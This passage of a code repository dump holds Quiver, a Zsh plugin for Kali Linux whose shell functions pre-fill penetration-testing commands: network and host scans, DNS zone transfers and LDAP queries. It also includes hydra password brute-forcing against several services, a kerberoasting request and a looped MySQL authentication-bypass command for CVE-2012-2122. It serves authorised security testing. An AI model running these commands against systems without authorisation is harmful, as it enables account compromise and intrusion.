[
  {
    "path": ".gitattributes",
    "content": "# Auto detect text files and perform LF normalization\n* text=auto\n"
  },
  {
    "path": ".gitignore",
    "content": "\n# ignore qq-custom.zsh module\nmodules/qq-custom.zsh\nlog.txt\nremote_checked.txt\nremote_ver.txt\n"
  },
  {
    "path": ".vscode/settings.json",
    "content": "{\n    \"editor.detectIndentation\": false\n}"
  },
  {
    "path": "LICENSE",
    "content": "MIT License\n\nCopyright (c) 2020 Steve McIlwain\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n"
  },
  {
    "path": "README.md",
    "content": "# Quiver : A Meta-Tool for Kali Linux\n\nQuiver is an organized namespace of shell functions that pre-fill commands in your terminal so that you can ditch your reliance on notes, copying, pasting, editing, copying and pasting again. Quiver helps you remember how to use every tool in your arsenal and doesn't hide them behind scripting that can be cumbersome to maintain or update. Instead you can use Quiver to build a composable, on-the-fly workflow for every situation. \n\nQuiver doesn't cover all tools, it's my own curated collection which I am still adding to and updating. There are so many tools for many different types of engagements and targets, so I jsut try to focus on tools that are maintained and current. Feel free to ask for the inclusion of tools you prefer in the issues list.\n\n# Release 1.0 \n\nAfter months of hard work during lockdown, I am happy to introduce the 1.0 release of Quiver! This version contains many improvements over previous versions such as per-namespace help and installers, auto-fill variables such as RHOST, RPORT, LHOST, LPORT, PROJECT, WORDLIST, URL and global configuration settings for customizing settings like a menu of your favorite wordlists. If you've been using Quiver before now, then many of the changes in 1.0 are breaking changes. Please familiarize yourself with the new commands using `qq-help`. If you previously were storing Quiver values in .zshrc, most of these can now be stored as global vars using `qq-vars-global`. 
\n\n* [RELEASES.md](RELEASES.md)\n\n# Features\n\n* Prefills the commands within a terminal\n* Well-organized commands with tab auto-completion\n* Installs as a ZSH / Oh-My-ZSH shell plugin\n* Customizable settings, Global variables\n* Recon phase commands for OSINT\n* Enumeration of common services\n* Web enumeration, brute-forcing and hacking\n* Exploit compilation helpers\n* Reverse shell handlers\n* Content serving commands\n* Built-in logbook for on-the-fly notes, saving commands\n* Render markdown notes to the command line\n* Kali Linux system management\n* Update notification and install\n* Installers for dependencies\n\n# Installation\n\nQuiver requires the following:\n\n* ZSH (apt-get install zsh)\n* oh-my-zsh (optional requirement but recommended: https://ohmyz.sh/)\n* Kali Linux (https://kali.org)\n\nClone the repo to your OMZ custom plugins folder.\n\n```bash\n\ngit clone https://github.com/stevemcilwain/quiver.git ~/.oh-my-zsh/custom/plugins/quiver\n\n```\nEdit ~/.zshrc to load the plugin.\n\n```\n\nplugins=(git quiver)\n\n```\n\nSource .zshrc to load the plugin and you're done. On first load, Quiver will install a few core packages.\n\n```\n\nsource ~/.zshrc\n\n```\n\n## Getting Started\n\nQuiver organizes commands into namespaces starting with `qq-`, such as `qq-enum-web` or `qq-recon-domains`.\nTo see an overview of all namespaces simply use `qq-help`. Each namespace also has its own help command, such as `qq-enum-web-help`, that provides a listing of available commands. All commands support tab completion and search. \n\n## Installing Dependencies\n\nEvery namespace has a qq-<namespace>-install command that will install all of the tools relevant to that namespace. You can install just the tools you need, or use `qq-install-all` to run the installers of all namespaces.\n\n## Workflow\n\nQuiver is meant to provide a composable, on-the-fly workflow. 
It replaces the common painful raw workflow of reading your notes, finding a command, copy, paste, replace the values with target values, copy, paste, run. Some rely heavily on completely automated scripts or frameworks that run all the commands for a workflow and output well-formatted data. While these scripts are great for many use cases, they can often be brittle, hide the underlying tools and techniques and be cumbersome to modify. Instead, Quiver gives you a happy medium: you can run commands quickly and easily with well-organized output, composing your workflow as you go depending on the targets and context. \n\n## Example Workflow\n\nHere is an example workflow for bug bounty hunting:\n\n### Prep\n\n```bash\n\n# if you have markdown notes, configure the path \nqq-vars-global-set-notes\n\n# set some session variables for the bounty target \nqq-vars-set-project \nqq-vars-set-domain \n\n# generate scope files from the bounty url\nqq-project-rescope\n\n# save vars for other terminal sessions, qq-vars-load\nqq-vars-save\n\n```\n\n### Passive Recon\n\n```bash\n\n# search for target files\nqq-recon-org-files\n\n# search downloaded files for urls\nqq-recon-org-files-urls\n\n# mine github repos for secrets\nqq-recon-github-gitrob\n\n# check dns records\nqq-enum-dns-dnsrecon\n\n# look for ASNs and networks\nqq-recon-networks-amass-asns\nqq-recon-networks-bgpview-ipv4\n\n# get subdomains\nqq-recon-subs-subfinder\n\n# resolve and parse subdomains\nqq-recon-subs-resolve-massdns\nqq-recon-subs-resolve-parse\n\n```\n\n### Active Web Enumeration\n\n```bash\n\n# Download robots.txt\nqq-enum-web-dirs-robots\n\n# ID a WAF if present\nqq-enum-web-waf\n\n# Parse SSL certs\nqq-enum-web-ssl-certs\n\n# Spider the site\nqq-enum-web-gospider\n\n# Brute force URIs\nqq-enum-web-dirs-ffuf\n\n# Read your notes\nqq-notes\n\n```\n"
  },
  {
    "path": "RELEASES.md",
    "content": "# Releases\n\n## 1.0 6/4/2020\n\nComplete refactor and reorganization, including:\n\n* Added qq-<namespace>-help commands to all modules\n* Added qq-<namespace>-install commands to all modules\n* More variables that auto-populate in qq-vars\n* Persistent variables in qq-vars-global for customization of settings\n* New qq-shell namespaces\n* Better organization in qq-recon namespaces\n* qq-bounty consolidated into qq-project, custom project commands moved to qq-project-custom\n* qq-notes updated with more features\n* New qq-kali namespace added with system commands\n* qq-install refactored to include custom installers\n* New qq-exploit namespace added  \n* New qq-enum-* namespaces added for more services\n\n## 0.16 3/28/2020\n\n* Fixed qq-bounty.zsh\n* Fixed qq-project.zsh: logfile and output settings\n* Fixed qq-vars.zsh recursively creating directories in __OUTPUT\n\n## 0.15 3/24/2020\n\n* Added qq-enum-mssql.zsh\n* Added qq-enum-mysql.zsh\n* Added qq-enum-oracle.zsh\n* Added qq-enum-nfs.zsh\n* Added qq-enum-pop3.zsh\n* qq-srv.zsh: added 3 new listeners for tar, nc>file and b64\n\n## 0.14 3/24/2020\n\n* quiver.plugin.zsh: added zstyle tab autocompletion\n** use qq-<tab> to search for commands across any namespace\n* qq-install.zsh\n** added jsbeautifier \n* qq-vars.zsh: set-output will now create the root directory if missing\n\n## 0.12 3/22/2020\n\n* qq-vars.zsh: Added global variables for the most common arguments, load and save\n* qq-srv.zsh: added updog\n* qq-project.zsh added folder scaffolding for projects / engagements\n* qq-log.zsh integration with qq-vars\n* Major change to output on all methods, uses $__OUTPUT as the directory from qq-vars.zsh\n* Lot of minor changes\n\n## 0.11 - 3/9/2020\n\n* You can now specify a path to your markdown notes by setting $__NOTES\n* qq-notes.zsh: notes search and display \n* qq-exploit.zsh: compilation helpers\n* qq-enum-web-php: php specific enumeration such as lfi, rfi and scans\n* minor fixes \n\n## 
0.10 - 3/4/2020\n\n* Added module: qq-enum-kerb.zsh for Kerberos enumeration functions\n* Added module: qq-enum-rdp.zsh for RDP enumeration functions\n* Added module: qq-enum-smb.zsh for SMB enumeration functions\n* Added qq-debug to print ~/.quiver/log.txt \n* Fixed glow commands to not use pager, leaving the output available in the console window\n\n## 0.9 - 3/4/2020\n\n* Minor fixes and improvements\n* Added scripts/recon.zsh\n* Added qq-bounty for bug bounty helpers\n* Added rescope to install script and qq-bounty\n* Added qq-enum-ldap\n* Removed noisy banner and log loading to ./quiver/log.txt\n* Added qq-enum-ftp-notes-vsftp\n* Added qq-custom.zsh module for your custom aliases and functions (ignored)\n* Added .gitignore (for qq-custom.zsh)\n\n## 0.8 - 2/25/2020\n\n* qq-pivot: added ssh tunneling commands\n* qq-log: added short aliases\n* qq-enum-web: moved fuzzing to qq-enum-web-fuzz\n* qq-enum-web-fuzz: added/grouped (not dirs) fuzzing commands\n* qq-enum-web-xss: added XSS helpers\n* qq-enum-web-ssl: added SSL commands and notes\n* qq-aliases: better organization, added aliases for custom functions\n\n\n"
  },
  {
    "path": "VERSION",
    "content": "1.0.0"
  },
  {
    "path": "modules/qq-encoding.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-encoding\n#############################################################\n\nqq-encoding-help() {\n    cat << \"DOC\"\n\nqq-encoding\n----------\nThe encoding namespace provides commands for encoding and decoding values.\n\nCommands\n--------\nqq-encoding-file-to-b64:       encodes plain text file to base64, optional $1 as file\nqq-encoding-file-from-b64:     decodes base64 file to plain text, optional $1 as file\n\nDOC\n}\n\nqq-encoding-file-to-b64() {\n    if [ \"$#\" -eq  \"1\" ]\n    then\n        print -z \"cat $1 | base64 > $1.b64\"\n    else \n        local f && __askpath f FILE $(pwd)\n        print -z \"cat ${f} | base64 > ${f}.b64\"\n    fi\n}\n\nqq-encoding-file-from-b64() {\n    if [ \"$#\" -eq  \"1\" ]\n    then\n        print -z \"cat $1 | base64 -d > $1.txt\"\n    else \n        local f && __askpath f FILE $(pwd)\n        print -z \"cat ${f} | base64 -d > ${f}.txt\"\n    fi\n}"
  },
  {
    "path": "modules/qq-enum-dhcp.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-dhcp\n#############################################################\n\nqq-enum-dhcp-help() {\n    cat << \"DOC\"\n\nqq-enum-dhcp\n-------------\nThe qq-enum-dhcp namespace contains commands for scanning and enumerating DHCP servers.\n\nCommands\n--------\nqq-enum-dhcp-install:           installs dependencies\nqq-enum-dhcp-nmap-sweep:        scan a network for services\nqq-enum-dhcp-tcpdump:           capture traffic to and from a host\nqq-enum-dhcp-discover-nmap:     broadcast DHCP discover packets\n\nDOC\n}\n\nqq-enum-dhcp-install() {\n    __info \"Running $0...\"\n    __pkgs tcpdump nmap \n}\n\nqq-enum-dhcp-sweep-nmap() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo nmap -n -Pn -sU -p67 ${__NETWORK} -oA $(__netpath)/dhcp-sweep\"\n}\n\nqq-enum-dhcp-tcpdump() {\n    __check-project\n    qq-vars-set-iface\n    qq-vars-set-rhost\n    print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and udp port 67 and port 68 -w $(__hostpath)/dhcp.pcap\"\n}\n\nqq-enum-dhcp-discover-nmap() {\n    print -z \"sudo nmap -v --script broadcast-dhcp-discover\"\n}\n"
  },
  {
    "path": "modules/qq-enum-dns.zsh",
    "content": "#!/usr/bin/env zsh\n \n############################################################# \n# qq-enum-dns\n#############################################################\n\nqq-enum-dns-help() {\n    cat << \"DOC\"\n\nqq-enum-dns\n-------------\nThe qq-enum-dns namespace contains commands for scanning and enumerating DNS records and servers.\nCommands are executed against specific name servers (__RHOST) rather than public resolvers.\n\nCommands\n--------\nqq-enum-dns-install:              installs dependencies\nqq-enum-dns-nmap-sweep:           scan a network for services\nqq-enum-dns-tcpdump:              capture traffic to and from a host\nqq-enum-dns-host-txfr:            attempt a zone transfer\nqq-enum-dns-host-all:             list all types\nqq-enum-dns-host-txt:             list txt records\nqq-enum-dns-host-mx:              list mx records\nqq-enum-dns-host-ns:              list ns records\nqq-enum-dns-host-srv:             list srv records\nqq-enum-dns-nmap-ad:              discover Active Directory related records\nqq-enum-dns-dnsrecon:             discover dns records, servers and attempt zone txfrs\nqq-enum-dns-dnsrecon-reverse:     do reverse lookups on an IP network\n\nDOC\n}\n\nqq-enum-dns-install() {\n    __info \"Running $0...\"\n    __pkgs tcpdump nmap dnsutils dnsrecon \n}\n\nqq-enum-dns-nmap-sweep() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo nmap -n -Pn -sS -sU -p53 ${__NETWORK} -oA $(__netpath)/dns-sweep\"\n}\n\nqq-enum-dns-tcpdump() {\n    __check-project  \n    __check-iface\n    qq-vars-set-rhost\n    print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 53 -w $(__hostpath)/dns.pcap\"\n}\n\nqq-enum-dns-host-txfr() {\n    qq-vars-set-rhost\n    qq-vars-set-domain\n    print -z \"host -l ${__DOMAIN} ${__RHOST}\"\n}\n\nqq-enum-dns-host-all() {\n    qq-vars-set-domain\n    qq-vars-set-rhost\n    print -z \"host -a ${__DOMAIN} ${__RHOST}\"\n}\n\nqq-enum-dns-host-txt() {\n    qq-vars-set-domain\n    
qq-vars-set-rhost\n    print -z \"host -t txt ${__DOMAIN} ${__RHOST}\"\n}\n\nqq-enum-dns-host-mx() {\n    qq-vars-set-domain\n    qq-vars-set-rhost\n    print -z \"host -t mx ${__DOMAIN} ${__RHOST}\"\n}\n\nqq-enum-dns-host-ns() {\n    qq-vars-set-domain\n    qq-vars-set-rhost\n    print -z \"host -t ns ${__DOMAIN} ${__RHOST}\"\n}\n\nqq-enum-dns-host-srv() {\n    qq-vars-set-domain\n    qq-vars-set-rhost\n    print -z \"host -t srv ${__DOMAIN} ${__RHOST}\"\n}\n\nqq-enum-dns-nmap-ad() {\n    __check-project\n    qq-vars-set-domain\n    qq-vars-set-rhost\n    print -z \"nmap --script dns-srv-enum --script-args dns-srv-enum.domain=${__DOMAIN} ${__RHOST} -o $(__dompath)/nmap-AD.txt\"\n}\n\nqq-enum-dns-dnsrecon() {\n    __check-project\n    qq-vars-set-domain\n    qq-vars-set-rhost\n    print -z \"dnsrecon -d ${__DOMAIN} -n ${__RHOST} -a -s -w -z --threads 10 -c $(__dompath)/dns.csv\"\n}\n\nqq-enum-dns-dnsrecon-reverse() {\n    __check-project\n    qq-vars-set-rhost\n    mkdir -p ${__PROJECT}/domains\n    print -z \"dnsrecon -r ${__NETWORK} -n ${__RHOST} -c ${__PROJECT}/domains/revdns.csv\"\n}\n"
  },
  {
    "path": "modules/qq-enum-ftp.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-ftp\n#############################################################\n\nqq-enum-ftp-help() {\n    cat << \"DOC\"\n\nqq-enum-ftp\n-------------\nThe qq-enum-ftp namespace contains commands for scanning and enumerating FTP servers.\n\nCommands\n--------\nqq-enum-ftp-install:           installs dependencies\nqq-enum-ftp-nmap-sweep:        scan a network for services\nqq-enum-ftp-tcpdump:           capture traffic to and from a host\nqq-enum-ftp-hydra:             brute force passwords for a user account\nqq-enum-ftp-lftp-grep:         search (grep) the target system\nqq-enum-ftp-wget-mirror:       mirror the FTP server locally\n\nDOC\n}\n\nqq-enum-ftp-install() {\n    __info \"Running $0...\"\n    __pkgs tcpdump nmap hydra ftp lftp wget \n}\n\nqq-enum-ftp-sweep-nmap() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo nmap -n -Pn -sS -p21 ${__NETWORK} -oA $(__netpath)/ftp-sweep\"\n}\n\nqq-enum-ftp-tcpdump() {\n    __check-project\n    qq-vars-set-iface\n    qq-vars-set-rhost\n    print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 21 -w $(__hostpath)/ftp.pcap\"\n}\n\nqq-enum-ftp-hydra() {\n    __check-project\n    qq-vars-set-rhost\n    __check-user\n    print -z \"hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/ftp-hydra-brute.txt ${__RHOST} FTP\"\n}\n\nqq-enum-ftp-lftp-grep() {\n    qq-vars-set-rhost\n    local q && __askvar q QUERY\n    print -z \"lftp ${__RHOST}:/ > find | grep -i \\\"${QUERY}\\\" \"\n}\n\nqq-enum-ftp-wget-mirror() {\n    __warn \"The destination site will be mirrored in the current directory\"\n    qq-vars-set-rhost\n    local u && __prefill u USER \"anonymous\"\n    local p && __prefill p PASSWORD \"anonymous@example.com\"\n    print -z \"wget --mirror ftp://${u}:${p}@${__RHOST}\"\n}\n"
  },
  {
    "path": "modules/qq-enum-host.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-host\n#############################################################\n\nqq-enum-host-help() {\n    cat << \"DOC\"\n\nqq-enum-host\n-------------\nThe qq-enum-host namespace contains commands for scanning and enumerating\nan individual host.\n\nCommands\n--------\nqq-enum-host-install:                 installs dependencies\nqq-enum-host-tcpdump:                 capture traffic to and from a host\nqq-enum-host-nmap-top:                syn scan of the top 1000 ports\nqq-enum-host-nmap-top-discovery:      syn scan of the top 1000 ports with versioning and scripts\nqq-enum-host-nmap-all:                syn scan all ports \nqq-enum-host-nmap-all-discovery:      syn scan all ports with versioning and scripts\nqq-enum-host-nmap-udp:                udp scan top 100 ports\nqq-enum-host-masscan-all-tcp:         scan all tcp ports\nqq-enum-host-masscan-all-udp:         scan all udp ports\nqq-enum-host-nmap-lse-grep:           search nmap lse scripts\n\nDOC\n}\n\nqq-enum-host-install() {\n    __info \"Running $0...\"\n    __pkgs tcpdump nmap masscan curl\n}\n\nqq-enum-host-tcpdump() {\n    __check-project\n    __check-iface\n    qq-vars-set-rhost\n    print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} -w $(__hostpath)/tcpdump.pcap\"\n}\n\nqq-enum-host-nmap-top(){\n    __check-project\n    qq-vars-set-rhost\n    print -z \"sudo nmap -vvv -Pn -sS --top-ports 1000 --open ${__RHOST} -oA $(__hostpath)/nmap-top\"\n}\n\nqq-enum-host-nmap-top-discovery(){\n    __check-project\n    qq-vars-set-rhost\n    print -z \"sudo nmap -vvv -Pn -sS --top-ports 1000 --open -sC -sV ${__RHOST} -oA $(__hostpath)/nmap-top-discovery\"\n}\n\nqq-enum-host-nmap-all() {\n    __check-project\n    qq-vars-set-rhost\n    print -z \"sudo nmap -vvv -Pn -sS -p- -T4 --open ${__RHOST} -oA $(__hostpath)/nmap-all\"\n}\n\nqq-enum-host-nmap-all-discovery() {\n    __check-project\n    qq-vars-set-rhost\n    
print -z \"sudo nmap -vvv -Pn -sS -p- -sC -sV --open ${__RHOST} -oA $(__hostpath)/nmap-all-discovery\"\n}\n\nqq-enum-host-nmap-udp() {\n    __check-project\n    qq-vars-set-rhost\n    print -z \"sudo nmap -v -Pn -sU --top-ports 100 -sV -sC --open ${__RHOST} -oA $(__hostpath)/nmap-udp\"\n}\n\nqq-enum-host-masscan-all-tcp() {\n    __check-iface\n    __check-project\n    qq-vars-set-rhost\n    print -z \"masscan -p1-65535 --open-only ${__RHOST} --rate=1000 -e ${__IFACE} -oL $(__hostpath)/masscan-all-tcp.txt\"\n}\n\nqq-enum-host-masscan-all-udp() {\n    __check-iface\n    __check-project\n    qq-vars-set-rhost\n    print -z \"masscan -pU:1-65535 --open-only ${__RHOST} --rate=1000 -e ${__IFACE} -oL $(__hostpath)/masscan-all-udp.txt\"\n}\n\nqq-enum-host-nmap-lse-grep() {\n    local q && __askvar q QUERY\n    print -z \"ls /usr/share/nmap/scripts/* | grep -ie \\\"${q}\\\" \"\n}\n\nqq-enum-host-ip() {\n    __check-project\n    qq-vars-set-rhost\n    print -z \"curl -s \\\"https://iplist.cc/api/${__RHOST}\\\" | tee $(__hostpath)/ip.json \"\n}"
  },
  {
    "path": "modules/qq-enum-kerb.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-kerb\n#############################################################\n\nqq-enum-kerb-help() {\n    cat << \"DOC\"\n\nqq-enum-kerb\n------------\nThe qq-enum-kerb namespace contains commands for scanning and \nenumerating kerberos records and servers.\n\nCommands\n--------\nqq-enum-kerb-install:        installs dependencies\nqq-enum-kerb-nmap-sweep:     scan a network for services\nqq-enum-kerb-tcpdump:        capture traffic to and from a host\nqq-enum-kerb-users:          enumerate domain users\nqq-enum-kerb-kerberoast:     get SPN for a service account\n\nDOC\n}\n\nqq-enum-kerb-install() {\n    __info \"Running $0...\"\n    __pkgs tcpdump nmap impacket-scripts   \n}\n\nqq-enum-kerb-nmap-sweep() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo nmap -n -Pn -sS -p88 ${__NETWORK} -oA $(__netpath)/kerb-sweep\"\n}\n\nqq-enum-kerb-tcpdump() {\n    __check-project\n    qq-vars-set-iface\n    qq-vars-set-rhost\n    print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 88 -w $(__hostpath)/kerb.pcap\"\n}\n\nqq-enum-kerb-users() {\n    qq-vars-set-rhost\n    local realm && __askvar realm REALM\n    print -z \"nmap -vvv -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=${realm},userdb=/usr/share/seclists/Usernames/Names/names.txt ${__RHOST}\"\n}\n\nqq-enum-kerb-kerberoast() {\n    __ask \"Enter target AD domain (must also be set in your hosts file)\"\n    qq-vars-set-domain\n    __ask \"Enter service user account\"\n    __check-user\n    __ask \"Enter the IP address of the target domain controller\"\n    qq-vars-set-rhost\n    print -z \"impacket-GetUserSPNs -request ${__DOMAIN}s/${__USER} -dc-ip ${__RHOST} \"\n}\n"
  },
  {
    "path": "modules/qq-enum-ldap.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-ldap\n#############################################################\n\nqq-enum-ldap-help() {\n    cat << \"DOC\"\n\nqq-enum-ldap\n------------\nThe qq-enum-ldap namespace contains commands for scanning and \nenumerating Active Directory DC, GC and LDAP servers.\n\nCommands\n--------\nqq-enum-ldap-install:        installs dependencies\nqq-enum-ldap-nmap-sweep:     scan a network for services\nqq-enum-ldap-tcpdump:        capture traffic to and from a host\nqq-enum-ldap-ctx:            query ldap naming contexts\nqq-enum-ldap-search-anon:    connect with anonymous bind and query ldap\nqq-enum-ldap-search-auth:    connect with authenticated bind and query ldap\nqq-enum-ldap-whoami:         send ldap whoami request\nqq-enum-ldap-hydra:          brute force passwords for a user account\n\nDOC\n}\n\nqq-enum-ldap-install() {\n    __info \"Running $0...\"\n    __pkgs tcpdump nmap ldap-utils hydra\n}\n\nqq-enum-ldap-nmap-sweep() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo nmap -n -Pn -sS -sU -p389,636,3269 ${__NETWORK} -oA $(__netpath)/ldap-sweep\"\n}\n\nqq-enum-ldap-tcpdump() {\n    __check-project\n    qq-vars-set-iface\n    qq-vars-set-rhost\n    print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 389 and port 636 and port 3269 -w $(__hostpath)/ldap.pcap\"\n}\n\nqq-enum-ldap-ctx() {\n    __ask \"Enter the address of the target DC, GC or LDAP server\"\n    qq-vars-set-rhost\n    print -z \"ldapsearch -x -h ${__RHOST} -s base namingcontexts\"\n}\n\nqq-enum-ldap-search-anon() {\n    __ask \"Enter the address of the target DC, GC or LDAP server\"\n    qq-vars-set-rhost\n    __ask \"Enter a distinguished name (DN), such as: DC=example,DC=com\"\n    local dn && __askvar dn DN\n    print -z \"ldapsearch -x -h ${__RHOST} -s sub -b \\\"${dn}\\\" \"\n}\n\nqq-enum-ldap-search-auth() {\n    __ask \"Enter the address of the target DC, 
GC or LDAP server\"\n    qq-vars-set-rhost\n    __ask \"Enter a distinguished name (DN), such as: DC=example,DC=com\"\n    local dn && __askvar dn DN\n    __ask \"Enter a user account with bind and read permissions to the directory\"\n    __check-user\n    print -z \"ldapsearch -x -h ${__RHOST} -D '${dn}' \\\"(objectClass=*)\\\" -w \\\"${__USER}\\\" \"\n}\n\nqq-enum-ldap-whoami() {\n    __ask \"Enter the address of the target DC, GC or LDAP server\"\n    qq-vars-set-rhost\n    print -z \"ldapwhoami -h ${__RHOST} -w \\\"non-existing-user\\\" \"\n}\n\nqq-enum-ldap-hydra() {\n    __check-project\n    qq-vars-set-rhost\n    __check-user\n    print -z \"hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/ldap-hydra-brute.txt ${__RHOST} LDAP\"\n}\n"
  },
  {
    "path": "modules/qq-enum-mssql.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-mssql\n#############################################################\n\nqq-enum-mssql-help() {\n    cat << \"DOC\"\n\nqq-enum-mssql\n-------------\nThe qq-enum-mssql namespace contains commands for scanning and \nenumerating MS SQL Server services and databases.\n\nCommands\n--------\nqq-enum-mssql-install:             installs dependencies\nqq-enum-mssql-nmap-sweep:          scan a network for services\nqq-enum-mssql-tcpdump:             capture traffic to and from a host\nqq-enum-mssql-sqsh:                make an interactive database connection\nqq-enum-mssql-impacket-client:     connect using impacket as a sql client\nqq-enum-mssql-hydra:               brute force passwords for a user account\n\nDOC\n}\n\nqq-enum-mssql-install() {\n    __info \"Running $0...\"\n    __pkgs tcpdump nmap sqsh impacket-scripts hydra\n}\n\nqq-enum-mssql-nmap-sweep() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo nmap -n -Pn -sS -sU -p T:1433,U:1434 ${__NETWORK} -oA $(__netpath)/mssql-sweep\"\n}\n\nqq-enum-mssql-tcpdump() {\n    __check-project\n    qq-vars-set-iface\n    qq-vars-set-rhost\n    print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 1433 -w $(__hostpath)/mssql.pcap\"\n}\n\nqq-enum-mssql-sqsh() {\n    __check-project\n    qq-vars-set-rhost\n    __check-user\n    print -z \"sqsh -S ${__RHOST} -U ${__USER}\"\n}\n\nqq-enum-mssql-impacket-client() {\n    qq-vars-set-rhost\n    __check-user\n    local db && __askvar db DATABASE\n    print -z \"python3 ${__IMPACKET}/mssqlclient.py ${__USER}@${__RHOST} -db ${db} -windows-auth \"\n}\n\nqq-enum-mssql-hydra() {\n    __check-project\n    qq-vars-set-rhost\n    __check-user\n    print -z \"hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/mssql-hydra-brute.txt ${__RHOST} MS-SQL\"\n}"
  },
  {
    "path": "modules/qq-enum-mysql.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-mmysql\n#############################################################\n\nqq-enum-mysql-help() {\n    cat << \"DOC\"\n\nqq-enum-mysql\n-------------\nThe qq-enum-mysql namespace contains commands for scanning and \nenumerating mysql server services and databases.\n\nCommands\n--------\nqq-enum-mysql-install:             installs dependencies\nqq-enum-mysql-nmap-sweep:          scan a network for services\nqq-enum-mysql-tcpdump:             capture traffic to and from a host\nqq-enum-mysql-client:              connect using the mysql client\nqq-enum-mysql-auth-bypass:         attempt auth bypass\nqq-enum-mysql-hydra:               brute force passwords for a user account\n\nDOC\n}\n\nqq-enum-mysql-install() {\n    __info \"Running $0...\"\n    __pkgs tcpdump nmap mysql\n}\n\nqq-enum-mysql-nmap-sweep() {\n    __check-project\n    qq-vars-set-network\n    print -z \"sudo nmap -n -Pn -sS -p 3306 ${__NETWORK} -oA $(__netpath)/mysql-sweep\"\n}\n\nqq-enum-mysql-tcpdump() {\n    __check-project\n    qq-vars-set-iface\n    qq-vars-set-rhost\n    print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 3306 -w $(__hostpath)/mysql.pcap\"\n}\n\nqq-enum-mysql-client(){\n    qq-vars-set-rhost\n    __check-user\n    print -z \"mysql -u ${__USER} -p -h ${__RHOST}\"\n}\n\nqq-enum-mysql-auth-bypass() {\n    qq-vars-set-rhost\n    __info \"CVE-2012-2122\"\n    print -z \"for i in {1..1000}; do mysql -u root --password=bad -h ${__RHOST} 2>/dev/null; done\"\n}\n\nqq-enum-mysql-hydra() {\n    __check-project\n    qq-vars-set-rhost\n    __check-user\n    local db && __prefill db DATABASE mysql\n    print -z \"hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/mysql-hydra-brute.txt ${__RHOST} MYSQL ${db}\"\n}\n"
  },
  {
    "path": "modules/qq-enum-network.zsh",
    "content": "#!/usr/bin/env zsh\n \n############################################################# \n# qq-enum-network\n#############################################################\n\nqq-enum-network-help() {\n    cat << \"DOC\"\n\nqq-enum-network\n-------------\nThe qq-enum-network namespace contains commands for scanning and enumerating\na network.\n\nCommands\n--------\nqq-enum-network-install:              installs dependencies\nqq-enum-network-tcpdump:              capture traffic to and from a network\nqq-enum-network-tcpdump-bcasts:       capture ethernet broadcasts and multi-cast traffic\nqq-enum-network-nmap-ping-sweep:      sweep a network with ping requests\nqq-enum-network-nmap-syn-sweep:       sweep a network with TCP syn requests, top 1000 ports\nqq-enum-network-nmap-udp-sweep:       sweep a network with UDP requests, top 100 ports\nqq-enum-network-nmap-all-sweep:       sweep a network with TCP syn requests, all ports\nqq-enum-network-nmap-discovery:       sweep a network with TCP syn requests and scripts, top 100 ports\nqq-enum-network-masscan-top:          sweep a network with TCP requests, uses $__TCP_PORTS global var\nqq-enum-network-masscan-windows:      sweep a network for common Windows ports\nqq-enum-network-masscan-linux:        sweep a network for common Linux ports\nqq-enum-network-masscan-web:          sweep a network for common web server ports\n\nDOC\n}\n\nqq-enum-network-install() {\n    __info \"Running $0...\"\n    __pkgs tcpdump nmap masscan\n}\n\n\nqq-enum-network-tcpdump() {\n    __check-project\n    qq-vars-set-iface\n    qq-vars-set-network\n    print -z \"sudo tcpdump -i ${__IFACE} net ${__NETWORK} -w $(__netpath)/network.pcap\"\n}\n\nqq-enum-network-tcpdump-bcasts() {\n    __check-project\n    qq-vars-set-iface\n    print -z \"sudo tcpdump -i ${__IFACE} ether broadcast and ether multicast -w $__PROJECT/networks/bcasts.pcap\"\n}\n\nqq-enum-network-nmap-ping-sweep() {\n    __check-project\n    qq-vars-set-network\n    print -z 
